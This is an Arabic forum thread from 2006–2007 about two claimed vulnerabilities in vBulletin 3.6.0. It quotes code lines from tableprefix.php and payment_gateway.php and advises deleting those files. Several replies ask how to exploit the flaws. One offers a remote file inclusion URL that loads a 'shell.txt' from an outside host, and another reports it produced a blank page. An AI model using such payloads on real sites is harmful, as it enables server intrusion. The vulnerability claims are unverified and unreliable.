ضع اعلانك هنا

 ضع اعلانك هنا ضع اعلانك هنا منتديات بوابة الاسلام
التاريخ 2008-8-13 التاريخ 2008-8-15 ضع اعلانك هنا ضع اعلانك هنا
 
العودة   عالم المعرفة > قسم الأنظمة والسيرفرات > الحماية من ثغرات المواقع و السرفرات
تحديث الصفحة ثغرتين في برنامج الـvBulletin الأصدار 3.6.0
تفعيل العضوية استرجاع كلمة المرور شروط المنتــدى البحث مشاركات اليوم اجعل كافة الأقسام مقروءة
الحماية من ثغرات المواقع و السرفرات Security,حمايه,ترقيع ثغرات,تبليغ عن ثغره,دروس حماية الموقع, دروس عن حماية الجهاز
 

ثغرتين في برنامج الـvBulletin الأصدار 3.6.0

الحماية من ثغرات المواقع و السرفرات


إضافة رد
صفحة 1 من 2 1 2 >
 
LinkBack أدوات الموضوع
 
قديم 10-28-2006, 01:31 PM   #1 (permalink)
XP

:: فريق عالم المعرفة::
 
الصورة الرمزية XP








XP غير متصل

XP has a spectacular aura aboutXP has a spectacular aura aboutXP has a spectacular aura about

افتراضي ثغرتين في برنامج الـvBulletin الأصدار 3.6.0
السلام عليكم ورحمة الله




الأولي في مجلد Install تحديداً ملف tableprefix.php

الخطأ البرمجي في السطر 31

كود:
require_once(DIR . "/{$vbulletin->config['Misc']['admincpdir']}/global.php");



الثغرة الثانية وهي الأخطر

تكمن في الصفحة الرئيسية للمنتدي

بملف payment_gateway.php
الثغرة بالسطر رقم 43


كود:
if (file_exists(DIR . '/includes/paymentapi/class_' . $api['classname'] . '.php'))

الحل حذف ملف payment_gateway.php من المجلد الرئيسي وهذا الملف ماله لازمه خاص في الاشتركات المدفوعه vb

وحذف مجلد Install من المجلد الرئسي vb


مكتشف الثغره H.M

التوقيع

(*) من سب صحابتي فعليه لعنة اللَّه والملائكة والناس أجمعين(*)
رواه الطبراني وهو في سلسلة الألباني الصحيحة

دعاءالشيخ خميس الزهراني

شروط التسجيل والكتابة في المنتدى

موضوع خطيرر تفضل بدخول

(اللهم أرزقنا قبل الموت توبه .. وعند الموت شهاده )

مركز تحميل الصور
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 10-28-2006, 04:23 PM   #2 (permalink)
عضو جديد






سكرتير xp غير متصل

سكرتير xp will become famous soon enoughسكرتير xp will become famous soon enough

افتراضي مشاركة: ثغرتين في برنامج الـvBulletin الأصدار 3.6.0
مشكور على الابداع يا استاذنا ودمت بخير كل سنة وانت طيب
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 10-29-2006, 01:37 PM   #3 (permalink)
عضو نشيط
 
الصورة الرمزية Saudi Hunter







Saudi Hunter غير متصل

Saudi Hunter will become famous soon enoughSaudi Hunter will become famous soon enough

Smile مشاركة: ثغرتين في برنامج الـvBulletin الأصدار 3.6.0
السلام عليكم ورحمة الله وبركاته

أشكرك جزيل الشكر على التنبيه

وكما أشكر صاحب الموضوع الأصلي العقرب الأحمر

لديّ سؤال ياعزيزي xp

وهو كيف استفيد من الخطأ الذي ذكره العقرب

كود PHP:
if (file_exists(DIR '/includes/paymentapi/class_' $api['classname'] . '.php')) 
ذكر أنها فايل إنكود

أنتظر تعليق ياغالي....
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 11-14-2006, 08:08 PM   #4 (permalink)
عضو نشيط







mr-CrazySystem غير متصل

mr-CrazySystem will become famous soon enoughmr-CrazySystem will become famous soon enough

افتراضي مشاركة: ثغرتين في برنامج الـvBulletin الأصدار 3.6.0
يعطيـك آلعـآفيـه يآلغـآلي آإكس بـي


وٍآإن شـآءآإلله يستفيــد آلــكل


وجآإرٍي تجـيب آلثقــرٍهـ




تحيآإتي لك آإكس بي



وٍدمـت بوٍد


تحيآإتي
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 04-19-2007, 08:12 PM   #5 (permalink)
عضو جديد






S a m i غير متصل

S a m i will become famous soon enoughS a m i will become famous soon enough

افتراضي مشاركة: ثغرتين في برنامج الـvBulletin الأصدار 3.6.0
الضاهر انها كذا
vb/payment_gateway.php?api['classname']=http://shell.txt
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 04-19-2007, 08:18 PM   #6 (permalink)
عضو فعال
 
الصورة الرمزية QTrXP







QTrXP غير متصل

QTrXP will become famous soon enoughQTrXP will become famous soon enough

افتراضي مشاركة: ثغرتين في برنامج الـvBulletin الأصدار 3.6.0
تسلم اخوي
انا مرقعها
ما قصرت

التوقيع

[


منتدى مخصص للدفاع عن النبي صلى الله علية وسلم

http://www.whoismohamad.com/forums/
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 04-20-2007, 04:29 AM   #7 (permalink)
عضو نشيط






عازف غير متصل

عازف will become famous soon enoughعازف will become famous soon enough

افتراضي مشاركة: ثغرتين في برنامج الـvBulletin الأصدار 3.6.0
الثغرات اللي بشكل هذا كيف نستغلها

لاهنت اخوي اكس بي ممكن شرح بسيط
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 04-21-2007, 02:21 AM   #8 (permalink)
عضو فعال
 
الصورة الرمزية ! firewall2010 !







! firewall2010 ! غير متصل

! firewall2010 ! has a spectacular aura about! firewall2010 ! has a spectacular aura about

افتراضي مشاركة: ثغرتين في برنامج الـvBulletin الأصدار 3.6.0
ومشكله الاستغلال هذه مشكله ياخي اكس بي

الان هذه ثغرات

كيف نستغلها ..

يعني انا ممكن اطلع ثغره ..

بس المشكله في كيفيه الاستغلال ..

ممكن توضح لنا بهذا الثغره اللي طرحتها هنا


لك خالص تحياااتي يا استاذنا العزيز

اخوك
هارت لورد
.

التوقيع

لابــــــد من شكــر لمعلمي XP على كل شي

فهــو من علمني كل شي بالاختراق .. فله الشكر بعد الله تعالى

وليجعلني الله استخدم ماعلمتني اياه في طاعته سبحانه .. ولمحاربة أعداءة
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 05-01-2007, 07:00 PM   #9 (permalink)
عضو جديد
 
الصورة الرمزية CODE MAN






CODE MAN غير متصل

CODE MAN will become famous soon enoughCODE MAN will become famous soon enough

افتراضي مشاركة: ثغرتين في برنامج الـvBulletin الأصدار 3.6.0
يعطيك العافية اخوي الغالي .
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 05-04-2007, 05:56 PM   #10 (permalink)
عضو جديد






mobd3box غير متصل

mobd3box will become famous soon enoughmobd3box will become famous soon enough

افتراضي مشاركة: ثغرتين في برنامج الـvBulletin الأصدار 3.6.0
اخواني .. جربت كود اخوي سامي
وطلعت الصفحه بيضاء ؟

هل من حل لها ؟
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
إضافة رد
صفحة 1 من 2 1 2 >

ثغرتين في برنامج الـvBulletin الأصدار 3.6.0

الحماية من ثغرات المواقع و السرفرات



« الموضوع السابق | الموضوع التالي »


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة


الساعة الآن 09:24 AM.

عدد الكلمات الدلالية 70 الاكثر بحث في الموقع
الكلمات الدلالية
اخبار ادوات اطفال الاستثمار البرفست البيزون الدروس الروافض السعوديه السنه الشيعه العاب الفلاش الفوتو شوب الكويت المجوس المهدي الهكر ايران برامج برامج اختراق برامج هكر بنات بي اتش بي تحميل تشفير تطوير تعلم تعليم ثغره ثيمات جرائم جوال حماية حوار دروس دومين رواتر شرح صميم صوره فضائح فيديو قنص كتاب كراك كمبيوتر محاضرات محمد مودم نطاق نطاقات نوكيا bifrost buffer crypter downloader exploit file inclusion local overflow poison python server shellcode sql injection trojan version vulnerability youtube


روابط مهمة

أقسام المنتدى

الرسول الإنسان | الدفاع عن أهل السنة | فضائح و جرائم الروافض | السنه | الحوارات الهادفة | الفلاش والسويتش | الفوتوشوب | دورة الفوتوشوب | صور | العاب | البرامج المشروحه | الفرفشه والمرح | الرياضة | الفايروسات | الهاردوير والصيانة | تطوير المنتديات والمواقع | دورة تطوير منتديات vb | الحمايه | اختراق المواقع والسيرفرات | هكرز | اختراق الشات والاميل | ثغرات | البرامج | الفيجوال بيسك | المواضيع العامه | القصص واللغات|  شات

الاتصال بنا - السنة - sitemap - الأعلى

Powered by vBulletin Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd
لا تتحمل إدارة منتديات عالم المعرفة أية مسؤولية حول أي موضوع يطرح في المنتدى فإن المكتوب يعبر عن رأى صاحبه أو ناقلة